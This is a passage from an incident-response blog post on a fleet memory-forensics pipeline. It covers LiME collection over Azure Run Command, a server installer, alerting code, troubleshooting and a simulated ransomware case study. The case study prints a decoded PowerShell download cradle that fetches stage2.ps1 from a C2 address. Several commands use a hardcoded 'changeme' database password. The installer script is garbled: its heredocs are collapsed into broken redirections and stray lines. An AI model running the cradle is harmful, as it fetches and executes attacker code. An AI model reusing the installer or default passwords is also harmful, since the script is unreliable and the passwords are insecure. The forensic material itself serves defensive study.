'RunPowerShellScript'\n\n    else:  # Linux\n        script = f\"\"\"#!\/bin\/bash\nKERNEL=$(uname -r)\nOUTPUT=\"\/tmp\/mem_ir_{timestamp}.lime\"\ncurl -sf '{build_server}\/lime-$KERNEL.ko' -o \/tmp\/lime_ir.ko\ninsmod \/tmp\/lime_ir.ko \"path=$OUTPUT format=lime timeout=0\"\nrmmod lime 2&gt;\/dev\/null || true\naz storage blob upload --account-name '{storage_account}' \\\\\n    --container-name '{container}' \\\\\n    --name '{vm_name}_{timestamp}.lime' \\\\\n    --file \"$OUTPUT\" --auth-mode login\nrm -f \"$OUTPUT\" \/tmp\/lime_ir.ko\n\"\"\"\n        script_type = 'RunShellScript'\n\n    # Execute via Run Command\n    poller = compute.virtual_machines.begin_run_command(\n        resource_group, vm_name,\n        {'command_id': script_type, 'script': [script]}\n    )\n    result = poller.result(timeout=3600)\n    output = result.value[0].message if result.value else ''\n    log.info(f\"Azure collection complete for {vm_name}: {output[-200:]}\")\n    return 'complete' in output.lower() or 'upload' in output.lower()<\/pre>\n<h3>One-shot pipeline installer<\/h3>\n<p>Everything in this post requires coordinated setup across multiple components. The one-shot installer below handles the complete pipeline deployment on a fresh Ubuntu 22.04 analysis server. Run it once, answer two prompts, and the full stack is operational. It is designed to be idempotent: running it a second time updates components without breaking what is already working.<\/p>\n<pre>#!\/bin\/bash\n## install_memory_pipeline.sh\n## One-shot installer for the complete memory analysis pipeline\n## Ubuntu 22.04 LTS - run as root\n## Usage: curl -fsSL https:\/\/raw.githubusercontent.com\/yourrepo\/memory-pipeline\/main\/install.sh | bash\n\nset -euo pipefail\n\nPIPELINE_VERSION=\"1.0.0\"\nPIPELINE_DIR=\"\/srv\/memory\"\nVENV_DIR=\"\/opt\/vol3-env\"\nDB_PASSWORD=$(openssl rand -base64 24 | tr -d '\/+=' | head -c 20)\nANALYST_PASSWORD=$(openssl rand -base64 24 | tr -d '\/+=' | head -c 20)\n\nRED='\\033[0;31m'; GREEN='\\033[0;32m'; YELLOW='\\033[1;33m'; NC='\\033[0m'\nlog_ok()   { echo -e \"${GREEN}[+]${NC} $*\"; }\nlog_info() { echo -e \"${YELLOW}[*]${NC} $*\"; }\nlog_err()  { echo -e \"${RED}[!]${NC} $*\"; }\n\necho \"==================================================\"\necho \" Memory Analysis Pipeline Installer v${PIPELINE_VERSION}\"\necho \" Analysis server setup for fleet IR\"\necho \"==================================================\"\necho\n\n# Preflight checks\n[[ $EUID -ne 0 ]] &amp;&amp; { log_err \"Run as root\"; exit 1; }\n[[ $(lsb_release -rs) != \"22.04\" ]] &amp;&amp; log_info \"Tested on Ubuntu 22.04 - other versions may work\"\n\n# Gather config\nread -p \"Analysis server IP (for Velociraptor\/dashboard access): \" SERVER_IP\nread -p \"Velociraptor server IP (or same as above): \" VR_SERVER_IP\nSERVER_IP=${SERVER_IP:-$(hostname -I | awk '{print $1}')}\nVR_SERVER_IP=${VR_SERVER_IP:-$SERVER_IP}\n\nlog_info \"Installing system packages\"\napt-get update -qq\nDEBIAN_FRONTEND=noninteractive apt-get install -y -qq \\\n    python3 python3-pip python3-venv python3-dev \\\n    git curl wget jq bc \\\n    parallel yara foremost bulk-extractor sleuthkit \\\n    docker.io docker-compose-plugin \\\n    postgresql-14 postgresql-client-14 \\\n    redis-server \\\n    nginx \\\n    smbclient \\\n    p7zip-full unzip \\\n    net-tools iotop iftop \\\n    libssl-dev libffi-dev libpq-dev \\\n    build-essential\n\nlog_ok \"System packages installed\"\n\n# Create analyst user\nif ! id analyst &amp;&gt;\/dev\/null; then\n    useradd -m -s \/bin\/bash analyst\n    usermod -aG docker analyst\n    log_ok \"Analyst user created\"\nfi\n\n# Directory structure\nmkdir -p $PIPELINE_DIR\/{landing,processing,complete,reports,yara_rules\/rules,logs,tools,lime_modules}\nmkdir -p $PIPELINE_DIR\/yara_rules\/clean_samples\nmkdir -p \/etc\/memory-ir\nchown -R analyst:analyst $PIPELINE_DIR\nlog_ok \"Directory structure created\"\n\n# Python virtual environment\nlog_info \"Setting up Python environment\"\npython3 -m venv $VENV_DIR\nsource $VENV_DIR\/bin\/activate\npip install --upgrade pip -q\npip install -q \\\n    volatility3 \\\n    yara-python \\\n    pefile \\\n    capstone \\\n    python-magic \\\n    requests \\\n    psycopg2-binary \\\n    redis \\\n    celery[redis] \\\n    flower \\\n    jinja2 \\\n    flask \\\n    watchdog \\\n    boto3 \\\n    azure-identity \\\n    azure-mgmt-compute\nlog_ok \"Python environment ready: $(vol --version)\"\n\n# Volatility symbols\nlog_info \"Downloading Volatility symbol tables (this takes a few minutes)\"\nmkdir -p \/opt\/vol3-symbols\nif [ ! -f \/opt\/vol3-symbols\/windows.zip ]; then\n    wget -q --show-progress \\\n        https:\/\/downloads.volatilityfoundation.org\/volatility3\/symbols\/windows.zip \\\n        -O \/opt\/vol3-symbols\/windows.zip\n    cd \/opt\/vol3-symbols\n    unzip -q windows.zip -d windows\/\nfi\nSITE_PKGS=$(python3 -c \"import site; print(site.getsitepackages()[0])\")\nln -sf \/opt\/vol3-symbols \"$SITE_PKGS\/volatility3\/symbols\" 2&gt;\/dev\/null || true\nlog_ok \"Volatility symbols installed\"\n\n# PostgreSQL\nlog_info \"Configuring PostgreSQL\"\nsystemctl start postgresql\nsystemctl enable postgresql\n\nsudo -u postgres psql -q &lt; \/etc\/memory-ir\/db.env &lt;&lt; DBEOF\nPOSTGRES_URL=postgresql:\/\/analyst:${DB_PASSWORD}@localhost\/memory_analysis\nCELERY_BROKER_URL=redis:\/\/localhost:6379\/0\nDBEOF\nchmod 640 \/etc\/memory-ir\/db.env\nchown analyst:analyst \/etc\/memory-ir\/db.env\n\n# Initialize schema\nsource \/etc\/memory-ir\/db.env\nPGPASSWORD=$DB_PASSWORD psql -U analyst -d memory_analysis -h localhost &lt;\/dev\/null || \\\n    log_info \"WinPmem download failed - download manually from $WINPMEM_URL\"\n\n# Systemd services\nlog_info \"Installing systemd services\"\n\n# Image watcher service\ncat &gt; \/etc\/systemd\/system\/memory-watcher.service &lt; \/etc\/systemd\/system\/memory-celery-triage.service &lt; \/etc\/systemd\/system\/memory-celery-deep.service &lt; \/root\/memory-pipeline-credentials.txt &lt;&lt; CREDEOF\nMemory Analysis Pipeline - Installation Credentials\n====================================================\nGenerated: $(date)\nServer IP: $SERVER_IP\n\nPostgreSQL:\n  Host:     localhost\n  Database: memory_analysis\n  User:     analyst\n  Password: $DB_PASSWORD\n  URL:      postgresql:\/\/analyst:${DB_PASSWORD}@localhost\/memory_analysis\n\nDashboard:\n  URL:  http:\/\/${SERVER_IP}:8080\n\nCelery Monitor (Flower):\n  URL:  http:\/\/${SERVER_IP}:5555\n\nPipeline directories:\n  Landing:    $PIPELINE_DIR\/landing\n  Reports:    $PIPELINE_DIR\/reports\n  Logs:       $PIPELINE_DIR\/logs\n  Yara rules: $PIPELINE_DIR\/yara_rules\/rules\/\nCREDEOF\nchmod 600 \/root\/memory-pipeline-credentials.txt\n\necho\necho &quot;==================================================&quot;\nlog_ok &quot;Installation complete!&quot;\necho &quot;==================================================&quot;\necho\necho &quot;Next steps:&quot;\necho &quot;  1. Copy pipeline scripts to $PIPELINE_DIR\/pipeline\/&quot;\necho &quot;  2. Add your Yara rules to $PIPELINE_DIR\/yara_rules\/rules\/&quot;\necho &quot;  3. Start services: systemctl start memory-watcher memory-celery-triage memory-celery-deep&quot;\necho &quot;  4. Check credentials: cat \/root\/memory-pipeline-credentials.txt&quot;\necho &quot;  5. Drop a test image into $PIPELINE_DIR\/landing\/ and watch the logs&quot;\necho\necho &quot;Dashboard will be available at: http:\/\/${SERVER_IP}:8080&quot;<\/pre>\n<h3>Alert integration: Slack, email, and PagerDuty notifications<\/h3>\n<p>A pipeline that silently processes images and writes results to a database is only useful if analysts are notified when high-risk findings arrive. The alert integration hooks into the report generation stage of the Celery pipeline and fires notifications through whichever channel your team monitors during incidents.<\/p>\n<pre>## pipeline\/alerts.py - Multi-channel alerting for critical findings\n\nimport os\nimport json\nimport logging\nimport smtplib\nimport requests\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom typing import Dict, Optional\n\nlog = logging.getLogger(__name__)\n\n# Configuration - set via environment variables\nSLACK_WEBHOOK_URL  = os.environ.get('SLACK_WEBHOOK_URL', '')\nPAGERDUTY_KEY      = os.environ.get('PAGERDUTY_INTEGRATION_KEY', '')\nALERT_EMAIL_FROM   = os.environ.get('ALERT_EMAIL_FROM', '')\nALERT_EMAIL_TO     = os.environ.get('ALERT_EMAIL_TO', '')\nSMTP_HOST          = os.environ.get('SMTP_HOST', 'localhost')\nSMTP_PORT          = int(os.environ.get('SMTP_PORT', '587'))\nDASHBOARD_URL      = os.environ.get('DASHBOARD_URL', 'http:\/\/localhost:8080')\n\ndef send_slack_alert(report: Dict) -&gt; bool:\n    \"\"\"Send a Slack notification for high\/critical findings.\"\"\"\n    if not SLACK_WEBHOOK_URL:\n        return False\n\n    hostname    = report.get('hostname', 'unknown')\n    risk_label  = report.get('risk_label', 'UNKNOWN')\n    risk_score  = report.get('risk_score', 0)\n    image_id    = report.get('image_id', 0)\n    has_malfind = report.get('has_malfind', False)\n    ioc_count   = report.get('ioc_count', 0)\n    susp_procs  = report.get('suspicious_procs', 0)\n\n    colour = {\n        'CRITICAL': '#FF0000',\n        'HIGH':     '#FF8C00',\n        'MEDIUM':   '#FFD700',\n        'LOW':      '#00FF00',\n    }.get(risk_label, '#808080')\n\n    # Build IOC summary\n    ioc_summary = ''\n    if report.get('iocs'):\n        top_iocs = report['iocs'][:5]\n        ioc_summary = '\\n'.join(\n            f\"  `{i['type']}`: {i['value'][:60]}\" for i in top_iocs\n        )\n        if len(report['iocs']) &gt; 5:\n            ioc_summary += f\"\\n  ...and {len(report['iocs'])-5} more\"\n\n    payload = {\n        'attachments': [{\n            'color': colour,\n            'title': f\":rotating_light: Memory Analysis Alert: {hostname}\",\n            'title_link': f\"{DASHBOARD_URL}\/host\/{image_id}\",\n            'fields': [\n                {'title': 'Risk Level',    'value': risk_label,       'short': True},\n                {'title': 'Risk Score',    'value': str(risk_score),  'short': True},\n                {'title': 'Malfind',       'value': 'YES :red_circle:' if has_malfind else 'No', 'short': True},\n                {'title': 'IOCs Found',    'value': str(ioc_count),   'short': True},\n                {'title': 'Suspicious Processes', 'value': str(susp_procs), 'short': True},\n            ],\n            'text': f\"*Top IOCs:*\\n{ioc_summary}\" if ioc_summary else '',\n            'footer': 'Memory Analysis Pipeline',\n            'ts':     int(__import__('time').time()),\n        }]\n    }\n\n    try:\n        resp = requests.post(SLACK_WEBHOOK_URL, json=payload, timeout=10)\n        resp.raise_for_status()\n        log.info(f\"Slack alert sent for {hostname}\")\n        return True\n    except Exception as e:\n        log.error(f\"Slack alert failed: {e}\")\n        return False\n\ndef send_pagerduty_alert(report: Dict) -&gt; bool:\n    \"\"\"Create a PagerDuty incident for critical findings.\"\"\"\n    if not PAGERDUTY_KEY or report.get('risk_label') != 'CRITICAL':\n        return False\n\n    hostname = report.get('hostname', 'unknown')\n    payload = {\n        'routing_key':  PAGERDUTY_KEY,\n        'event_action': 'trigger',\n        'dedup_key':    f\"memory-ir-{hostname}-{report.get('image_id')}\",\n        'payload': {\n            'summary':    f\"CRITICAL memory finding on {hostname} - Score: {report.get('risk_score')}\",\n            'severity':   'critical',\n            'source':     'memory-analysis-pipeline',\n            'component':  hostname,\n            'group':      'incident-response',\n            'class':      'memory-forensics',\n            'custom_details': {\n                'image_id':           report.get('image_id'),\n                'has_malfind':        report.get('has_malfind'),\n                'ioc_count':          report.get('ioc_count'),\n                'suspicious_procs':   report.get('suspicious_procs'),\n                'dashboard_url':      f\"{DASHBOARD_URL}\/host\/{report.get('image_id')}\",\n                'top_iocs':           report.get('iocs', [])[:3],\n            }\n        },\n        'links': [{\n            'href': f\"{DASHBOARD_URL}\/host\/{report.get('image_id')}\",\n            'text': 'View in Dashboard'\n        }]\n    }\n\n    try:\n        resp = requests.post(\n            'https:\/\/events.pagerduty.com\/v2\/enqueue',\n            json=payload, timeout=10\n        )\n        resp.raise_for_status()\n        log.info(f\"PagerDuty incident created for {hostname}\")\n        return True\n    except Exception as e:\n        log.error(f\"PagerDuty alert failed: {e}\")\n        return False\n\ndef send_email_alert(report: Dict) -&gt; bool:\n    \"\"\"Send an email alert for high and critical findings.\"\"\"\n    if not all([ALERT_EMAIL_FROM, ALERT_EMAIL_TO, SMTP_HOST]):\n        return False\n\n    hostname   = report.get('hostname', 'unknown')\n    risk_label = report.get('risk_label', 'UNKNOWN')\n\n    subject = f\"[{risk_label}] Memory Analysis Alert: {hostname}\"\n\n    body = f\"\"\"\nMemory Analysis Pipeline Alert\n================================\n\nHost:         {hostname}\nRisk Level:   {risk_label}\nRisk Score:   {report.get('risk_score', 0)}\nImage ID:     {report.get('image_id')}\nHas Malfind:  {'YES - INJECTION DETECTED' if report.get('has_malfind') else 'No'}\nIOCs Found:   {report.get('ioc_count', 0)}\nSusp. Procs:  {report.get('suspicious_procs', 0)}\n\nDashboard: {DASHBOARD_URL}\/host\/{report.get('image_id')}\n\nTop IOCs:\n\"\"\"\n    for ioc in report.get('iocs', [])[:10]:\n        body += f\"  [{ioc['type']}] {ioc['value']}\\n\"\n\n    if report.get('malfind_regions'):\n        body += \"\\nInjection Indicators:\\n\"\n        for m in report['malfind_regions'][:5]:\n            body += f\"  PID {m['pid']} ({m['process']}): {m['protection']} \"\n            body += f\"PE={'YES' if m.get('has_pe') else 'no'} Risk={m['risk']}\\n\"\n\n    body += \"\\n--\\nMemory Analysis Pipeline - automated notification\"\n\n    msg = MIMEMultipart()\n    msg['From']    = ALERT_EMAIL_FROM\n    msg['To']      = ALERT_EMAIL_TO\n    msg['Subject'] = subject\n    msg.attach(MIMEText(body, 'plain'))\n\n    try:\n        with smtplib.SMTP(SMTP_HOST, SMTP_PORT, timeout=15) as smtp:\n            smtp.starttls()\n            smtp.sendmail(ALERT_EMAIL_FROM, [ALERT_EMAIL_TO], msg.as_string())\n        log.info(f\"Email alert sent for {hostname}\")\n        return True\n    except Exception as e:\n        log.error(f\"Email alert failed: {e}\")\n        return False\n\ndef fire_alerts(report: Dict) -&gt; None:\n    \"\"\"Fire all configured alerts for a completed analysis report.\"\"\"\n    risk_label = report.get('risk_label', 'LOW')\n\n    if risk_label not in ('HIGH', 'CRITICAL'):\n        return\n\n    hostname = report.get('hostname', 'unknown')\n    log.info(f\"Firing alerts for {hostname} (risk={risk_label})\")\n\n    send_slack_alert(report)\n    send_email_alert(report)\n\n    if risk_label == 'CRITICAL':\n        send_pagerduty_alert(report)\n\n## Add to \/etc\/memory-ir\/alerts.env and load in all service unit files:\n# SLACK_WEBHOOK_URL=https:\/\/hooks.slack.com\/services\/YOUR\/WEBHOOK\/URL\n# PAGERDUTY_INTEGRATION_KEY=your_pd_integration_key\n# ALERT_EMAIL_FROM=memory-pipeline@corp.local\n# ALERT_EMAIL_TO=ir-team@corp.local\n# SMTP_HOST=smtp.corp.local\n# SMTP_PORT=587\n# DASHBOARD_URL=http:\/\/192.168.1.100:8080<\/pre>\n<h3>Troubleshooting: common failures and fixes<\/h3>\n<p>These are the failures that actually happen in production deployments, with the specific fix for each one.<\/p>\n<p><strong>Volatility fails with &#8220;No suitable address space mapping found&#8221;.<\/strong> This means Volatility could not identify the OS version from the memory image. The most common cause is missing symbol tables. Check that the symbol tables are correctly linked:<\/p>\n<pre>## Symbol table troubleshooting\nsource \/opt\/vol3-env\/bin\/activate\n\n# Verify symbols are accessible\npython3 -c \"\nimport volatility3.symbols\nimport os\nsym_path = os.path.dirname(volatility3.symbols.__file__)\nprint('Symbol path:', sym_path)\nwindows_syms = os.path.join(sym_path, 'windows')\nif os.path.isdir(windows_syms):\n    nspkg = os.listdir(windows_syms)\n    print(f'Windows symbol files: {len(nspkg)}')\n    print('Sample:', nspkg[:3] if nspkg else 'NONE - symbols missing')\nelse:\n    print('ERROR: No windows symbol directory found')\n\"\n\n# If symbols missing, re-download and re-link\nwget -q https:\/\/downloads.volatilityfoundation.org\/volatility3\/symbols\/windows.zip \\\n    -O \/tmp\/windows.zip\nmkdir -p \/opt\/vol3-symbols\nunzip -q \/tmp\/windows.zip -d \/opt\/vol3-symbols\/windows\/\n\nSITE=$(python3 -c \"import site; print(site.getsitepackages()[0])\")\nrm -f $SITE\/volatility3\/symbols\/windows\nln -sf \/opt\/vol3-symbols\/windows $SITE\/volatility3\/symbols\/windows\necho \"Symbols re-linked\"\n\n# Test with a real image\nvol -f \/srv\/memory\/landing\/test.raw windows.info 2&gt;&amp;1 | head -20<\/pre>\n<p><strong>Image watcher detects the file but pipeline does not start.<\/strong> The watcher detected the file but the Celery worker is not processing tasks. Check the worker is actually running and connected to Redis:<\/p>\n<pre>## Pipeline connectivity troubleshooting\n\n# Check Celery workers are running\nsystemctl status memory-celery-triage memory-celery-deep\n\n# Check Redis is reachable\nredis-cli ping  # Should return PONG\n\n# Check queue has tasks\nredis-cli llen celery  # Default queue\nredis-cli llen triage  # Triage queue\n\n# Check for failed tasks (tasks that errored and are stuck)\nsource \/opt\/vol3-env\/bin\/activate\ncelery -A pipeline inspect active\ncelery -A pipeline inspect scheduled\ncelery -A pipeline inspect reserved\n\n# Manually trigger pipeline for an existing image\npython3 -c \"\nimport sys\nsys.path.insert(0, '\/srv\/memory\/pipeline')\nfrom pipeline import validate_image\nvalidate_image.delay(int(sys.argv[1]))\nprint('Task queued')\n\" 123  # Replace 123 with the image ID from the database\n\n# Watch the triage worker log in real time\ntail -f \/srv\/memory\/logs\/celery_triage.log<\/pre>\n<p><strong>Memory image SHA256 does not match expected value.<\/strong> The image was corrupted during transfer. This happens most commonly when the network drops mid-transfer or when the image file was still being written when the watcher triggered. The validation stage catches this and marks the image as invalid, but the image needs to be re-collected:<\/p>\n<pre>## Handling corrupt or partial images\n\n# Check which images failed validation\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nSELECT id, hostname, status, image_size_gb, sha256\nFROM memory_images\nWHERE status IN ('validation_failed', 'pending')\nORDER BY received_at DESC;\"\n\n# Check if image file looks complete\npython3 -c \"\nimport sys\nfrom pathlib import Path\nimg = Path(sys.argv[1])\nsize_gb = img.stat().st_size \/ 1e9\n# A 16GB RAM system should produce at least 10GB compressed\nprint(f'File: {img.name}')\nprint(f'Size: {size_gb:.2f} GB')\n# Read last 1KB to check it is not truncated mid-write\nwith open(img, 'rb') as f:\n    f.seek(-1024, 2)\n    tail = f.read(1024)\nprint(f'Last 1KB entropy: {len(set(tail))} unique bytes (low=truncated, high=ok)')\n\" \/srv\/memory\/landing\/suspicious_image.raw\n\n# Re-queue a corrected image for processing\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nUPDATE memory_images SET status = 'received' WHERE id = 123;\"\n# Then manually trigger: validate_image.delay(123)<\/pre>\n<p><strong>Malfind returns no results on a known-compromised image.<\/strong> Two common causes. First, if the image is from a 32-bit process but Volatility is applying 64-bit analysis, malfind will miss 32-bit injection artefacts. Second, certain process protections (PPL, anticheat, certain EDR implementations) prevent Volatility from reading process memory correctly even from a raw image.<\/p>\n<pre>## Malfind troubleshooting\n\n# Check the OS and process bitness\nvol -f memory.raw windows.info\nvol -f memory.raw windows.pslist | head -20\n\n# Try running malfind against a specific PID explicitly\nvol -f memory.raw windows.malfind --pid 1234\n\n# If malfind misses things, try the raw VAD scanner\nvol -f memory.raw windows.vadinfo --pid 1234 | grep EXECUTE\n\n# Cross-check with alternative approach: look for RWX memory directly\nvol -f memory.raw windows.vadwalk --pid 1234 | \\\n    grep -E \"(EXECUTE_READ_WRITE|EXECUTE_WRITECOPY)\"\n\n# For 32-bit processes on 64-bit systems, the WOW64 layer\n# requires specific handling - check the process bitness:\nvol -f memory.raw windows.dlllist --pid 1234 | grep \"wow64\\|WoW64\" | head -5<\/pre>\n<p><strong>Pipeline processes images but risk scores are all zero.<\/strong> The triage stage ran but found nothing suspicious. This is usually correct, but if you know the image is from a compromised host it means the anomaly detection rules need tuning for your environment. The most common cause is that the suspicious parent-child pairs in the triage code do not match the specific process names on that system:<\/p>\n<pre>## Risk scoring troubleshooting\n\n# Check what the triage actually found\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nSELECT\n    mi.hostname,\n    tr.process_count,\n    tr.suspicious_process_count,\n    tr.network_conn_count,\n    tr.risk_score,\n    tr.triage_summary\nFROM memory_images mi\nLEFT JOIN triage_results tr ON tr.image_id = mi.id\nWHERE mi.id = 123;\"\n\n# List all processes that were analysed\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nSELECT pid, ppid, name, path, is_suspicious, suspicious_reason\nFROM process_list\nWHERE image_id = 123\nORDER BY is_suspicious DESC, pid;\"\n\n# If you know a specific process is malicious but it was not flagged,\n# check what parent name the triage code saw vs what was expected\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nSELECT pl.pid, pl.name, pl.path,\n       parent.name AS parent_name\nFROM process_list pl\nLEFT JOIN process_list parent ON parent.pid = pl.ppid AND parent.image_id = pl.image_id\nWHERE pl.image_id = 123\nORDER BY pl.pid;\"<\/pre>\n<h3>End-to-end worked example: a simulated ransomware incident<\/h3>\n<p>This section walks through the complete pipeline from the moment a threat is detected through to a final analyst report, using a realistic scenario. A Monday morning at 07:15 UTC. The SOC receives an alert that a domain controller (DC01, 64GB RAM) and three workstations (WS-FINANCE-01, WS-FINANCE-02, WS-FINANCE-03, 16GB RAM each) are showing unusual SMB activity and encrypted file extensions appearing on a file server. The decision is made to collect memory from all four systems before any containment action that might destroy volatile evidence.<\/p>\n<pre>## Step 1: Run the network impact assessment before starting anything\n\npython3 \/srv\/memory\/network_impact.py &lt;&lt; &#039;EOF&#039;\nendpoints = {\n    &quot;dc01_64gb&quot;:           {&quot;count&quot;: 1, &quot;ram_gb&quot;: 64, &quot;compression_ratio&quot;: 0.60},\n    &quot;finance_workstations&quot;: {&quot;count&quot;: 3, &quot;ram_gb&quot;: 16, &quot;compression_ratio&quot;: 0.65},\n}\nlink_speed_mbps  = 1000\nmax_utilisation  = 0.30\nEOF\n\n## Output:\n## dc01_64gb:\n##   Compressed size: ~38.4 GB per image\n##   Transfer time:   ~17.1 minutes per host at 30% link\n## finance_workstations:\n##   Compressed size: ~10.4 GB per image\n##   Transfer time:   ~4.6 minutes per host at 30% link\n##\n## Total data volume:   69.6 GB\n## Recommended max concurrent collections: 3 endpoints\n## Total sequential time: ~33 minutes<\/pre>\n<pre>## Step 2: Launch tiered collection\n## DC01 goes first (tier 1) at higher throttle\n## Workstations collect in parallel (tier 3)\n\npython3 \/srv\/memory\/collection_orchestrator.py \\\n    --config \/etc\/velociraptor\/server.config.yaml &lt;&lt; &#039;EOF&#039;\ntargets = [\n    CollectionTarget(&quot;DC01&quot;,           &quot;C.abc123&quot;, tier=1, ram_gb=64, priority_ioc=True),\n    CollectionTarget(&quot;WS-FINANCE-01&quot;,  &quot;C.def456&quot;, tier=3, ram_gb=16, priority_ioc=True),\n    CollectionTarget(&quot;WS-FINANCE-02&quot;,  &quot;C.ghi789&quot;, tier=3, ram_gb=16),\n    CollectionTarget(&quot;WS-FINANCE-03&quot;,  &quot;C.jkl012&quot;, tier=3, ram_gb=16),\n]\nEOF\n\n## Collection log output:\n## 07:16:01 Starting Tier 1: DCs and critical servers\n## 07:16:02   Started: DC01 (hunt: H.001)\n## 07:33:14   Completed: DC01 (17.2 min)\n## 07:33:15 Starting Tier 3: Workstations\n## 07:33:16   Started: WS-FINANCE-01 (hunt: H.002)\n## 07:33:16   Started: WS-FINANCE-02 (hunt: H.003)\n## 07:33:16   Started: WS-FINANCE-03 (hunt: H.004)\n## 07:38:01   Completed: WS-FINANCE-01 (4.7 min)\n## 07:38:22   Completed: WS-FINANCE-02 (5.1 min)\n## 07:39:05   Completed: WS-FINANCE-03 (5.8 min)\n## 07:39:05 Tier 3 complete\n## Campaign complete: 4\/4 collected in 23.1 min<\/pre>\n<pre>## Step 3: Pipeline auto-processes images as they land\n## Watch the processing in real time\n\nwatch -n 10 'psql postgresql:\/\/analyst:changeme@localhost\/memory_analysis \\\n    -c \"SELECT hostname, status, risk_score,\n               suspicious_process_count, has_malfind\n        FROM memory_images mi\n        LEFT JOIN triage_results tr ON tr.image_id = mi.id\n        ORDER BY received_at;\"'\n\n## By 07:52 UTC (36 min after collection started) all four are complete:\n##\n## hostname       | status   | risk_score | susp_procs | malfind\n## ---------------+----------+------------+------------+--------\n## DC01           | complete |         85 |          3 | t\n## WS-FINANCE-01  | complete |         70 |          2 | t\n## WS-FINANCE-02  | complete |         20 |          1 | f\n## WS-FINANCE-03  | complete |          5 |          0 | f<\/pre>\n<pre>## Step 4: Slack alert fires at 07:38 when WS-FINANCE-01 completes\n##\n## :rotating_light: Memory Analysis Alert: WS-FINANCE-01\n## Risk Level:   HIGH\n## Risk Score:   70\n## Malfind:      YES :red_circle:\n## IOCs Found:   4\n## Susp. Procs:  2\n##\n## Top IOCs:\n##   ip_address: 185.220.101.47    (port 443)\n##   url: https:\/\/185.220.101.47\/submit.php\n##   url: https:\/\/185.220.101.47\/stage2.ps1\n##\n## At 07:41 PagerDuty fires when DC01 completes with CRITICAL risk score 85<\/pre>\n<pre>## Step 5: Run fleet correlation\npython3 \/srv\/memory\/cross_correlation.py\n\n## Output:\n## SHARED C2 IPs DETECTED across 1 IP:\n##   185.220.101.47:443 on 2 hosts: ['DC01', 'WS-FINANCE-01']\n##\n## Shared injection patterns: 2 hosts have EXECUTE_READ_WRITE anonymous regions\n## Lateral movement indicators:\n##   powershell.exe on WS-FINANCE-01 at 06:52:14\n##   powershell.exe on DC01           at 06:58:33  (6 min later)\n##   powershell.exe on WS-FINANCE-02  at 07:03:11  (5 min later)<\/pre>\n<pre>## Step 6: Deep dive DC01 - the most critical finding\n## Get the image path and run additional plugins\n\nDC01_IMAGE=$(psql postgresql:\/\/analyst:changeme@localhost\/memory_analysis \\\n    -t -c \"SELECT image_path FROM memory_images WHERE hostname='DC01';\")\n\nsource \/opt\/vol3-env\/bin\/activate\n\n# Get command lines for the 3 suspicious processes\nvol -f $DC01_IMAGE windows.cmdline | grep -A1 \"powershell\\|cmd\\|mshta\" | head -30\n\n## Output shows:\n## PID 4892 - C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n##   CommandLine: powershell.exe -NonInteractive -NoProfile -enc SQBFAFgA...\n##\n## Decode it:\necho \"SQBFAFgA...\" | base64 -d | iconv -f utf-16le -t utf-8\n## IEX (New-Object Net.WebClient).DownloadString('https:\/\/185.220.101.47\/stage2.ps1')\n\n# Dump the malfind region for the injected code\nMALFIND_ADDR=$(psql postgresql:\/\/analyst:changeme@localhost\/memory_analysis \\\n    -t -c \"SELECT vad_start FROM malfind_results\n           WHERE image_id=(SELECT id FROM memory_images WHERE hostname='DC01')\n           AND risk_level='CRITICAL' LIMIT 1;\")\n\nvol -f $DC01_IMAGE windows.dumpfiles --virtaddr $MALFIND_ADDR \\\n    --pid 4892 -o \/srv\/memory\/reports\/DC01\/\n\n# Run Yara against the dump\nyara \/srv\/memory\/yara_rules\/combined.yar \/srv\/memory\/reports\/DC01\/*.img\n## CobaltStrike_Beacon_Config_Decoded matched: \/srv\/memory\/reports\/DC01\/file.0x4892.img<\/pre>\n<pre>## Step 7: Analyst conclusion and IoC extraction for blocking\n\npython3 \/srv\/memory\/cross_correlation.py &gt; \/srv\/memory\/reports\/fleet_final.json\n\n# Extract all IOCs for firewall\/EDR blocking\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nSELECT DISTINCT ioc_type, ioc_value, COUNT(DISTINCT image_id) AS host_count\nFROM iocs_extracted\nGROUP BY ioc_type, ioc_value\nORDER BY host_count DESC, ioc_type;\" | tee \/srv\/memory\/reports\/iocs_for_blocking.txt\n\n## ioc_type    | ioc_value           | host_count\n## ------------+---------------------+-----------\n## ip_address  | 185.220.101.47      | 2\n## url         | ...\/submit.php      | 2\n## url         | ...\/stage2.ps1      | 1\n\n## Timeline: 07:15 alert -&gt; 07:39 all images collected -&gt; 07:52 all processed\n## -&gt; 07:55 fleet correlation complete -&gt; 08:05 IOCs extracted for blocking\n## Total: 50 minutes from alert to actionable IOCs from memory analysis of 4 hosts<\/pre>\n<p>The complete timeline from initial alert to actionable intelligence was 50 minutes for four endpoints. The network impact across the collection phase stayed below 28% of the available 1Gbps link. The pipeline processed all four images automatically without analyst intervention beyond launching the collection campaign and reviewing the dashboard. The Slack and PagerDuty alerts fired as each critical finding completed, meaning analysts were reviewing DC01&#8217;s results while WS-FINANCE-02 and WS-FINANCE-03 were still being collected.<\/p>\n<p>The key finding that would not have been available from event log analysis alone: the base64 encoded PowerShell command in DC01&#8217;s process memory decoded to the exact C2 URL, which was then cross-correlated across all four images to show that WS-FINANCE-01 had contacted the same infrastructure six minutes before the first event log entry appeared on DC01. Memory forensics provided a six-minute earlier indicator of compromise than the event log did, because the process memory captured the in-flight download cradle before the connection appeared in any log.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A complete guide to collecting and analysing memory from dozens of Windows endpoints simultaneously. Covers Velociraptor fleet collection with network-aware throttling, tiered collection strategies to protect production infrastructure, an automated Volatility 3 processing pipeline with Docker and Celery, IOC extraction, and analyst-ready reporting. Includes all helper scripts and pipeline 